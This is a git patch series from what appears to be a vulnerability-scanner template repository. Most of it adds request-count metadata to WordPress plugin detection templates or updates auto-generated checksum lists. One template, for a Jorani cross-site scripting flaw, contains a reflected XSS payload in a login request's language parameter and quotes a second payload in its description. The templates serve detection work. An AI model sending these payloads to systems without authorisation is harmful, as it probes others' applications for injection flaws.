plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 01fb12d0ad..ee05e3add8 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: + max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 1773857e15..df2487955f 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: + max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index bcd1509c68..79ff01211c 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: + max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index c6aca20a60..23414b3d1d 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: + max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 56dfdf4a59..fba45020e4 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: + max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 810fc82cde..0178c8e9fb 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: + max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 2276545093..017cf76f11 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: + max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 783d381ed8..a04ddc6003 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: + max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 8bdc600063..2ead906817 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: + max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index ab61cc0338..dedd2e23b6 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: + max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 5f6fbc1f75..03cd7137a8 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: + max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index d67150d038..a68d4b7d78 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: + max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index beeba7ca69..bf9dfc3ad8 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: + max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index c225df7bfd..47911a86a5 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: + max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index aaad04cb76..1c25b6f488 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: + max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index ff750a7d2a..b36317acd8 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: + max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index f1e7595ccd..5eb35dd17e 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: + max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 4b2769ee46..ceb2b8d600 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: + max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 3f59cf8416bfee40c3df2740f1e4bbc96d2f6f28 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 31 Aug 2023 11:07:44 +0530 Subject: [PATCH 0030/1090] Update jorani-benjamin-xss.yaml --- http/vulnerabilities/jorani/jorani-benjamin-xss.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml index 2dd67af05b..63e77a6842 100644 --- a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml +++ b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml @@ -11,6 +11,7 @@ info: metadata: max-request: 2 verified: true + shodan-query: http.favicon.hash:-2032163853 tags: jorani,benjamin,xss http: @@ -24,7 +25,7 @@ http: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ennois&login=bbalet&CipheredValue= + csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=en-GBarh5l%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ennois&login={{randstr}}&CipheredValue= host-redirects: true cookie-reuse: true From 4307056ea30af7182243ec081cd625fdd60c590c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 31 Aug 2023 11:10:07 +0530 Subject: [PATCH 0031/1090] change high - medium --- http/vulnerabilities/jorani/jorani-benjamin-xss.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml index 63e77a6842..f8987ab8ae 100644 --- a/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml +++ b/http/vulnerabilities/jorani/jorani-benjamin-xss.yaml @@ -3,7 +3,7 @@ id: jorani-benjamin-xss info: name: Jorani v1.0.3-2014-2023 Benjamin BALET - Cross-Site Scripting author: ritikchaddha - severity: high + severity: medium description: | The value of the `language request` parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75943";alert(1)//569 was submitted in the language parameter. This input was echoed unmodified in the application's response. The attacker can modify the token session and he can discover sensitive information for the server. reference: From 5a727f41bfde2d003d77dc629438abe2019cf15d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 05:45:39 +0000 Subject: [PATCH 0032/1090] Auto Generated New Template Addition List [Thu Aug 31 05:45:38 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e16eeb61b8..4842155e80 100644 --- a/.new-additions +++ b/.new-additions @@ -18,6 +18,7 @@ http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml http/technologies/wordpress/plugins/wp-seopress.yaml http/vulnerabilities/hikvision/hikvision-fastjson-rce.yaml http/vulnerabilities/hikvision/hikvision-ivms-file-upload-bypass.yaml +http/vulnerabilities/jorani/jorani-benjamin-xss.yaml http/vulnerabilities/other/landray-oa-datajson-rce.yaml http/vulnerabilities/prestashop/prestashop-apmarketplace-sqli.yaml workflows/kev-workflow.yaml From a3c60fdbece566cecab0a66206a3296a22c3f7f5 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 31 Aug 2023 05:45:51 +0000 Subject: [PATCH 0033/1090] Auto Generated Templates Checksum [Thu Aug 31 05:45:51 UTC 2023] :robot: --- templates-checksum.txt | 405 +++++++++++++++++++++-------------------- 1 file changed, 203 insertions(+), 202 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2f96ecb31..146ee08a5f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5789,217 +5789,217 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 